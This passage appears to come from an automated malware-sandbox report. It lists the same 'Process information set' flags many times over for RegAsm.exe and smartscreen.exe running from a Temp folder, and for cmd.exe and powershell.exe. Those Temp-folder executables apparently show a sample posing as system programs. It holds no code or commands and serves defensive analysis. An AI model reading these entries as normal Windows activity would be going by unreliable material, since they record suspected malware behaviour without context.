                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
